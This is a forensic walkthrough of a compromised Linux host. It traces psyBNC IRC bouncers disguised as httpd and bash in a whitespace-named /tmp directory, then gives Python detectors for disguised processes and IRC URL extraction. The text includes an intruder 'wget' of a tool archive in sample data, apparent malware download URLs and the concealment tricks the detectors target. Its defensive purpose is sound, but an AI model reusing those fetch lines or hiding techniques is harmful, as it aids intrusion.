apache    2193  6576  0 Apr12 ?        00:00:00 /usr/sbin/httpd
apache    2194  6576  0 Apr12 ?        00:00:00 /usr/sbin/httpd
root      2197     1  0 Mar01 ?        00:00:00 /usr/sbin/atd
apache    2202  6576  0 Apr13 ?        00:00:00 /usr/sbin/httpd
68        2213     1  0 Mar01 ?        00:00:00 hald
root      2214  2213  0 Mar01 ?        00:00:00 hald-runner
68        2221  2214  0 Mar01 ?        00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
68        2228  2214  0 Mar01 ?        00:00:00 hald-addon-keyboard: listening on /dev/input/event0
root      2237  2214  0 Mar01 ?        00:00:32 hald-addon-storage: polling /dev/hdc
root      2261     1  0 Mar01 ?        00:00:00 /usr/bin/perl -w /bin/ntpmon
root      2264     1  0 Mar01 tty1     00:00:00 /sbin/mingetty tty1
root      2265     1  0 Mar01 tty2     00:00:00 /sbin/mingetty tty2
root      2276     1  0 Mar01 tty3     00:00:00 /sbin/mingetty tty3
root      2279     1  0 Mar01 tty4     00:00:00 /sbin/mingetty tty4
root      2282     1  0 Mar01 tty5     00:00:00 /sbin/mingetty tty5
root      2283     1  0 Mar01 tty6     00:00:00 /sbin/mingetty tty6
root      6574     1  0 Mar24 ?        00:00:00 /usr/sbin/nss_pcache off /etc/httpd/alias
root      6576     1  0 Mar24 ?        00:00:02 /usr/sbin/httpd
guest     6599     1  0 Apr08 ?        00:01:38 /usr/local/apache/bin/httpd -DSSL
named    10374     1  0 Apr08 ?        00:00:23 /usr/sbin/named -u named
guest    14522     1  0 04:44 ?        00:00:00 bash
root     15451  1954  0 08:57 ?        00:00:00 sshd: root@pts/0
root     15453 15451  0 08:57 pts/0    00:00:00 -bash
root     15481 15453  0 08:57 pts/0    00:00:00 -csh
root     15521 15481  0 08:58 pts/0    00:00:00 ps -ef
apache   27549  6576  0 Apr12 ?        00:00:00 /usr/sbin/httpd
pc18:/tmp/ > ps -ef|grep guest
root      1839     1  0 Mar01 ?        00:01:22 /usr/sbin/vmware-guestd --background /var/run/vmware-guestd.pid
guest     6599     1  0 Apr08 ?        00:01:38 /usr/local/apache/bin/httpd -DSSL
guest    14522     1  0 04:44 ?        00:00:00 bash
pc18:/tmp/ > lsof -p 6599
COMMAND  PID  USER   FD   TYPE DEVICE    SIZE    NODE NAME
httpd   6599 guest  cwd    DIR    8,1       0 1317314 /tmp/ /redone (deleted)
httpd   6599 guest  rtd    DIR    8,1    4096       2 /
httpd   6599 guest  txt    REG    8,1  202544 1317318 /tmp/ /redone/httpd (deleted)
httpd   6599 guest  mem    REG    8,1   76400  426061 /lib/libresolv-2.5.so
httpd   6599 guest  mem    REG    8,1  125736  425986 /lib/ld-2.5.so
httpd   6599 guest  mem    REG    8,1 1589908  426002 /lib/libc-2.5.so
httpd   6599 guest  mem    REG    8,1  208352  426025 /lib/libm-2.5.so
httpd   6599 guest  mem    REG    8,1   46680  426024 /lib/libnss_files-2.5.so
httpd   6599 guest  mem    REG    8,1   21788  426022 /lib/libnss_dns-2.5.so
httpd   6599 guest    0u   CHR  136,4               6 /dev/pts/4 (deleted)
httpd   6599 guest    1u   CHR  136,4               6 /dev/pts/4 (deleted)
httpd   6599 guest    2u   CHR  136,4               6 /dev/pts/4 (deleted)
httpd   6599 guest    3u  IPv4        2774371         TCP *:acmsoda (LISTEN)
httpd   6599 guest    4w   REG    8,1   21577 1409728 /tmp/ /redone/log/psybnc.log.old (deleted)
httpd   6599 guest    5w   REG    8,1       5 1317329 /tmp/ /redone/psybnc.pid (deleted)
httpd   6599 guest    6u  IPv4        3238239         TCP pc18:4144->Tampa.FL.US.Undernet.org:ircd (CLOSE_WAIT)
httpd   6599 guest    7w   REG    8,1       0 1409729 /tmp/ /redone/log/USER1.TRL (deleted)
httpd   6599 guest    8u  IPv4        3277295         TCP pc18:4759->undernet.xs4all.nl:6669 (CLOSE_WAIT)
httpd   6599 guest    9w   REG    8,1       0 1409732 /tmp/ /redone/log/USER2.TRL (deleted)
httpd   6599 guest   10u  IPv4        3276160         TCP pc18:acmsoda->pc19.supernet.logicomp-data.1stclass.ro:sbl (CLOSE_WAIT)
httpd   6599 guest   11u  sock    0,5         3279588 can't identify protocol
httpd   6599 guest   12u  IPv4        3279548         UDP pc18:de-cache-query->[delete]1:domain
pc18:/tmp/ > lsof -p 14522
COMMAND   PID  USER   FD   TYPE DEVICE    SIZE    NODE NAME
bash    14522 guest  cwd    DIR    8,1    4096 1409630 /home/guest/ /psybnc
bash    14522 guest  rtd    DIR    8,1    4096       2 /
bash    14522 guest  txt    REG    8,1  210248 1417464 /home/guest/ /psybnc/bash
bash    14522 guest  mem    REG    8,1   21788  426022 /lib/libnss_dns-2.5.so
bash    14522 guest  mem    REG    8,1   46680  426024 /lib/libnss_files-2.5.so
bash    14522 guest  mem    REG    8,1   76400  426061 /lib/libresolv-2.5.so
bash    14522 guest  mem    REG    8,1  125736  425986 /lib/ld-2.5.so
bash    14522 guest  mem    REG    8,1 1589908  426002 /lib/libc-2.5.so
bash    14522 guest  mem    REG    8,1  208352  426025 /lib/libm-2.5.so
bash    14522 guest    0u   CHR  136,2               4 /dev/pts/2 (deleted)
bash    14522 guest    1u   CHR  136,2               4 /dev/pts/2 (deleted)
bash    14522 guest    2u   CHR  136,2               4 /dev/pts/2 (deleted)
bash    14522 guest    3u  IPv4        3281690         TCP *:31337 (LISTEN)
bash    14522 guest    4w   REG    8,1     574 1417469 /home/guest/ /psybnc/log/psybnc.log
bash    14522 guest    5w   REG    8,1       6 1417470 /home/guest/ /psybnc/psybnc.pid
bash    14522 guest    7w   REG    8,1       0 1417472 /home/guest/ /psybnc/log/USER1.TRL
bash    14522 guest    8u  IPv4        3281720         TCP pc18:video-activmail->Tampa.FL.US.Undernet.org:ircd (ESTABLISHED)
pc18:/tmp/ > cd /home/quest
/home/quest: No such file or directory.
pc18:/tmp/ > cd /home/guest/" "/
pc18:/home/guest/ > ls
./  ../  psybnc/  PsyLinux.tgz
pc18:/home/guest/ > cd psybnc/
pc18:/home/guest/ /psybnc> ls -tlr
total 420
-rwxr-xr-x  1 guest guest    369 Aug  9  2000 psybncchk*
-rwxr-xr-x  1 guest guest  17982 Mar 26  2001 COPYING*
-rwxr-xr-x  1 guest guest  15738 Jul 15  2001 SCRIPTING*
-rwxr-xr-x  1 guest guest   3901 Jan 12  2002 targets.mak*
-rwxr-xr-x  1 guest guest    929 May  7  2002 config.h*
-rwxr-xr-x  1 guest guest   3560 Jul 25  2003 FAQ*
-rwxr-xr-x  1 guest guest  35624 Jul 26  2003 README*
-rwxr-xr-x  1 guest guest   2137 Sep 26  2003 Makefile*
-rwxr-xr-x  1 guest guest   1618 Sep 26  2003 TODO*
-rwxr-xr-x  1 guest guest  34872 Jun 25  2004 CHANGES*
-rwxr-xr-x  1 guest guest    947 Jan  6  2006 salt.h*
-rwxr-xr-x  1 guest guest   8090 Jan  6  2006 makesalt*
-rwxr-xr-x  1 guest guest    731 Jan  6  2006 makefile.out*
-rwxr-xr-x  1 guest guest 210248 Jan  6  2006 bash*
drwxr-xr-x  2 guest guest   4096 Jul 16  2007 src/
drwxr-xr-x  3 guest guest   4096 Jul 16  2007 scripts/
drwxr-xr-x  3 guest guest   4096 Jul 16  2007 menuconf/
drwxr-xr-x  2 guest guest   4096 Jul 16  2007 lang/
drwxr-xr-x  2 guest guest  12288 Jul 16  2007 help/
drwxr-xr-x  2 guest guest   4096 Jul 16  2007 tools/
drwxr-xr-x  3 guest guest   4096 Apr 16 04:43 ../
-rw-------  1 guest guest      6 Apr 16 04:44 psybnc.pid
drwxr-xr-x  2 guest guest   4096 Apr 16 04:44 log/
drwxr-xr-x  2 guest guest   4096 Apr 16 04:45 motd/
-rw-------  1 guest guest   1040 Apr 16 04:51 psybnc.conf.old
-rw-------  1 guest guest   1040 Apr 16 04:58 psybnc.conf
drwxr-xr-x 10 guest guest   4096 Apr 16 04:58 ./
pc18:/home/guest/ /psybnc> cd /proc/6599
pc18:/proc/6599> ls -l
total 0
dr-xr-xr-x  5 guest guest 0 Apr 16 00:06 ./
dr-xr-xr-x 92 root  root  0 Mar  1 17:40 ../
dr-xr-xr-x  2 guest guest 0 Apr 16 09:02 attr/
-r--------  1 guest guest 0 Apr 16 09:02 auxv
-r--r--r--  1 guest guest 0 Apr 16 06:30 cmdline
-r--r--r--  1 guest guest 0 Apr 16 09:02 cpuset
lrwxrwxrwx  1 guest guest 0 Apr 16 08:58 cwd -> /tmp/ /redone (deleted)
-r--------  1 guest guest 0 Apr 16 09:02 environ
lrwxrwxrwx  1 guest guest 0 Apr 16 08:58 exe -> /tmp/ /redone/httpd (deleted)
dr-x------  2 guest guest 0 Apr 16 08:58 fd/
-rw-r--r--  1 guest guest 0 Apr 16 09:02 loginuid
-r--r--r--  1 guest guest 0 Apr 16 08:58 maps
-rw-------  1 guest guest 0 Apr 16 09:02 mem
-r--r--r--  1 guest guest 0 Apr 16 09:02 mounts
-r--------  1 guest guest 0 Apr 16 09:02 mountstats
-rw-r--r--  1 guest guest 0 Apr 16 09:02 oom_adj
-r--r--r--  1 guest guest 0 Apr 16 09:02 oom_score
lrwxrwxrwx  1 guest guest 0 Apr 16 08:58 root -> //
-r--r--r--  1 guest guest 0 Apr 16 09:02 schedstat
-r--------  1 guest guest 0 Apr 16 09:02 smaps
-r--r--r--  1 guest guest 0 Apr 16 08:58 stat
-r--r--r--  1 guest guest 0 Apr 16 09:02 statm
-r--r--r--  1 guest guest 0 Apr 16 06:30 status
dr-xr-xr-x  3 guest guest 0 Apr 16 09:02 task/
-r--r--r--  1 guest guest 0 Apr 16 09:02 wchan
pc18:/proc/6599> cat exe > /tmp/httpd
pc18:/proc/6599> ls -l /tmp/httpd
-rw-r--r-- 1 root root 202544 Apr 16 09:02 /tmp/httpd
pc18:/proc/6599> rm /tmp/httpd
rm: remove regular file `/tmp/httpd'? yes
pc18:/proc/6599> exit
exit
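What the root console found by hand above (a process named httpd whose executable is a deleted file under /tmp/" ", a process named bash whose executable is not /bin/bash, and the recovery of the deleted binary through /proc/PID/exe) can be turned into a sweep of /proc. The following is an added example, not part of the original slides: a pure function that judges one process from its name and the readlink() targets of its exe and cwd links, a collector that walks /proc, and a preservation routine that copies a running image out through /proc/PID/exe and hashes it. The trusted-directory list, the temp-directory list and the set of system-binary names are assumptions to be adapted; the sample records are constructed from the lsof and /proc output on this page.

```python
import hashlib
import os

# Directories where a binary named like a system daemon or shell is expected
# to live. Assumed list; extend for the distribution being examined.
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/",
                "/usr/lib/", "/usr/lib64/", "/lib/", "/lib64/", "/usr/local/sbin/")
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Names an intruder picks so the process blends into ps output. Assumed set.
SYSTEM_NAMES = {"bash", "sh", "httpd", "sshd", "crond", "init", "kthread", "named"}
DELETED = " (deleted)"


def reasons(name, exe, cwd):
    """Judge one process from its /proc name and the readlink() targets of
    exe and cwd. The kernel appends ' (deleted)' to a link target whose file
    was unlinked after the process started using it."""
    out = []
    path = exe[:-len(DELETED)] if exe.endswith(DELETED) else exe
    if path != exe:
        out.append("executable deleted while running")
    if path.startswith(TEMP_DIRS):
        out.append("executable lives in a temp directory")
    # A directory component that is non-empty but all whitespace (the " " trick).
    if any(comp and not comp.strip() for comp in path.split("/")[1:-1]):
        out.append("whitespace-only directory name in executable path")
    if name in SYSTEM_NAMES and not path.startswith(TRUSTED_DIRS):
        out.append(f"named like a system binary ({name}) but runs from {path}")
    if cwd.endswith(DELETED):
        out.append("working directory deleted")
    return out


def scan_records(records):
    """records: iterable of (pid, name, exe, cwd). Returns only the suspicious ones."""
    return [(pid, name, exe, why) for pid, name, exe, cwd in records
            if (why := reasons(name, exe, cwd))]


def proc_records(proc="/proc"):
    """Yield (pid, name, exe, cwd) for every process we are allowed to inspect.
    The name comes from /proc/PID/status, which the 2.6.18 kernel on this page
    has (/proc/PID/comm only appeared in 2.6.33)."""
    for pid in filter(str.isdigit, os.listdir(proc)):
        base = os.path.join(proc, pid)
        try:
            with open(os.path.join(base, "status")) as f:
                name = next(l for l in f if l.startswith("Name:")).split(None, 1)[1].strip()
            exe = os.readlink(os.path.join(base, "exe"))
            cwd = os.readlink(os.path.join(base, "cwd"))
        except (OSError, StopIteration):
            continue        # kernel thread, process already gone, or not permitted
        yield int(pid), name, exe, cwd


def preserve_exe(pid, outdir, proc="/proc"):
    """Copy the running image out through /proc/PID/exe (works after the on-disk
    file is unlinked) and return (path, sha256 hex). Point outdir at a mounted
    evidence volume, not at the compromised host's /tmp."""
    src = os.path.join(proc, str(pid), "exe")
    dst = os.path.join(outdir, f"pid{pid}.exe")
    digest = hashlib.sha256()
    with open(src, "rb") as fin, open(dst, "wb") as fout:
        for chunk in iter(lambda: fin.read(1 << 16), b""):
            digest.update(chunk)
            fout.write(chunk)
    return dst, digest.hexdigest()


# Constructed records mirroring what lsof and /proc showed on this page.
SAMPLE_RECORDS = [
    (6599, "httpd", "/tmp/ /redone/httpd (deleted)", "/tmp/ /redone (deleted)"),
    (14522, "bash", "/home/guest/ /psybnc/bash", "/home/guest/ /psybnc"),
    (6576, "httpd", "/usr/sbin/httpd", "/"),
    (15453, "bash", "/bin/bash", "/root"),
]

if __name__ == "__main__":
    # On a live host replace SAMPLE_RECORDS with proc_records(); run as root so
    # that exe/cwd of other users' processes can be read.
    for pid, name, exe, why in scan_records(SAMPLE_RECORDS):
        print(f"{pid:6d} {name:8s} {exe}\n        " + "\n        ".join(why))
```

Two caveats a practitioner should keep in mind: the cmdline and the name are both under the process's control (the first bouncer above advertises itself as "/usr/local/apache/bin/httpd -DSSL"), so only the exe link is worth trusting; and the exe link itself stays readable only as long as the process lives, so preserve the image before killing anything.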

IRC traffic sample

IRC chat excerpt (as rendered on the original slide):

International: user that is the root .. is anyone on the local ..
International: if you give me someone to root flood :))..
_keech: sheep may be in luck and catch at least one root: D.
Baned #: 22 I did not just root Scanning with php ..
# N.A.S.A: you have a root with php? ..
International: root that had 180 days up `and nobody entered him :))..
oz: I had a root ..
oz: director at the bank

Top 5 URIs that have appeared in the IRC data

On port 31337
  155  http://radiokyky.ghcomm.net:8080/listen.pls
   10  http://eliteradio.info:8181/listen.pls
    8  http://cservice.undernet.org/live/view_app.php?id=1238682998-9084&back=checkapp
    8  http://bsh.ro
    6  http://staudeasuprata.hi5.com

On port 6667
  471  http://radiokyky.ghcomm.net:8080/listen.pls
   73  http://bsh.ro
   32  http://www.eastside.ro
   26  http://asculta.radioliberty.ro:1989/listen.pls
   22  http://cservice.undernet.org/live/view_app.php?id=1238751547-147470&ba

On port 6669
    2  http://phlo0.ucoz.de/psydarwin.tgz
    2  http://alexandrucordea.ws
    1  http://www.youtube.com/watch?v=wxuwycmsrto&nr=1
    1  http://www.youtube.com/watch?v=mghqs3wk27w
    1  http://www.youtube.com/watch?v=_5pysbiaxvs&nr=1

On port 6969
   26  http://cservice.undernet.org/live/view_app.php?id=1239110902-9084&back=checkapp
    7  http://www.mirc.com/get.html
    4  http://79.113.108.242:8000
    3  http://ftp.reflectionspress.com/postcard/postcard.exe
    2  http://sportpedia.mysport.ro/images/2/21/prepelita_andrei.jpg
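The per-port URI tables above come from pulling URLs out of the reassembled IRC streams and counting them by destination port. The block below is an added example of that step, not part of the original slides: it parses raw IRC protocol lines, takes URLs only from commands that carry free text (PRIVMSG, NOTICE, TOPIC and the 332 topic reply, so a URL in a JOIN or PING parameter is ignored), normalises scheme and host, tallies per port, and separately lists URLs that end in an archive or executable suffix, which is where tool drops such as psydarwin.tgz and postcard.exe show up. The records are constructed (port, line) pairs using hosts from this page's tables; the suffix list and the choice of text-carrying commands are assumptions.

```python
import re
from collections import Counter, defaultdict

URL_RE = re.compile(r'''\bhttps?://[^\s<>"']+''', re.I)
# ":prefix COMMAND params" with an optional prefix; the command is a word or a
# three-digit numeric reply.
IRC_MSG_RE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>[A-Z]+|\d{3})\s+(?P<params>.*)$")
# Commands whose parameters carry text a user or bot typed. Assumed set.
TEXT_COMMANDS = {"PRIVMSG", "NOTICE", "TOPIC", "332"}
# Suffixes that usually mean a tool drop rather than a link being shared. Assumed.
DROP_SUFFIXES = (".exe", ".tgz", ".tar.gz", ".tar", ".zip", ".rar", ".pl", ".sh")

# Constructed (destination port, raw IRC line) records.
SAMPLE = [
    (6667,  ":International!i@host PRIVMSG #chan :asculta http://radiokyky.ghcomm.net:8080/listen.pls"),
    (6667,  ":oz!o@host PRIVMSG #chan :http://radiokyky.ghcomm.net:8080/listen.pls ."),
    (6667,  ":irc.undernet.org 332 oz #chan :http://radiokyky.ghcomm.net:8080/listen.pls | http://bsh.ro"),
    (6667,  ":_keech!k@host NOTICE oz :http://bsh.ro, intra"),
    (31337, ":International!i@host PRIVMSG #chan :http://radiokyky.ghcomm.net:8080/listen.pls"),
    (31337, ":International!i@host PRIVMSG #chan :HTTP://radiokyky.ghcomm.net:8080/listen.pls"),
    (6669,  ":x!x@host PRIVMSG oz :wget http://phlo0.ucoz.de/psydarwin.tgz"),
    (6969,  ":y!y@host PRIVMSG #chan :http://ftp.reflectionspress.com/postcard/postcard.exe"),
    (6969,  "PING :irc.undernet.org"),
    (6969,  ":y!y@host JOIN #chan http://not-a-message.example"),
]


def normalize(url):
    """Lower-case scheme and host, keep the path as typed, drop trailing punctuation."""
    url = url.rstrip(".,;:!?)'\"")
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return f"{scheme.lower()}://{host.lower()}{sep}{path}"


def extract_urls(line):
    """URLs from one raw IRC line, taken only from message text."""
    m = IRC_MSG_RE.match(line)
    if not m or m["cmd"] not in TEXT_COMMANDS:
        return []
    return [normalize(u) for u in URL_RE.findall(m["params"])]


def top_urls(records, n=5):
    """{port: [(url, count), ...]} with the n most frequent URLs per destination port."""
    per_port = defaultdict(Counter)
    for port, line in records:
        per_port[port].update(extract_urls(line))
    return {port: c.most_common(n) for port, c in per_port.items()}


def likely_payloads(records):
    """Sorted URLs whose path ends in an archive or executable suffix."""
    found = set()
    for _, line in records:
        for url in extract_urls(line):
            path = url.split("://", 1)[1].partition("?")[0]
            if path.lower().endswith(DROP_SUFFIXES):
                found.add(url)
    return sorted(found)


if __name__ == "__main__":
    for port, urls in sorted(top_urls(SAMPLE).items()):
        print(f"On port {port}")
        for url, count in urls:
            print(f"{count:5d}  {url}")
    print("likely payloads:", *likely_payloads(SAMPLE), sep="\n  ")
```

To feed it real captures, reassemble each TCP stream (tcpflow or tcptrace -e both write one file per direction), take the destination port from the stream's file name, and pass each line of the client-to-server side as a record; the bouncer's own listener port (31337 here) then shows what its users post, while 6667/6669 show the same text as relayed to the network.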